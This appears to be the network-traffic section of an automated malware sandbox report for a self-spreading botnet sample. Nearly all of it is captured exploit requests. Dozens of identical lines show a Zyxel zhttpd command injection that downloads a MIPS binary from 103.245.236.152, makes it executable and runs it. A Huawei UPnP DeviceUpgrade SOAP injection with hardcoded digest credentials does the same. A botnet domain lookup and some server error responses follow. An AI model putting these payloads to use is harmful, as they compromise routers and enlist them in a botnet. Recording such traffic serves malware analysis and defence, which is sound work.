          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: unknownDNS traffic detected: queries for: haha.skyljne.click
          Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 475Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/htmlCache-Control: no-cache, no-storeConnection: closeContent-Length: 686X-Iinfo: 12-10691949-0 0NNN RT(1705243613188 0) q(0 -1 -1 -1) r(0 -1)Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 35 26 78 69 6e 66 6f 3d 31 32 2d 31 30 36 39 31 39 34 39 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 37 30 35 32 34 33 36 31 33 31 38 38 25 32 30 30 25 32 39 25 32 30 71 25 32 38 30 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 36 30 30 38 32 32 34 31 37 35 37 31 39 30 36 30 34 26 65 64 65 74 3d 39 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 50 4f 53 54 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 36 30 30 38 32 32 34 31 37 35 37 31 39 30 36 30 34 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=12-10691949-0%200NNN%20RT%281705243613188%200%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-60082241757190604&edet=9&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-60082241757190604</iframe></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Jan 2024 14:50:14 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
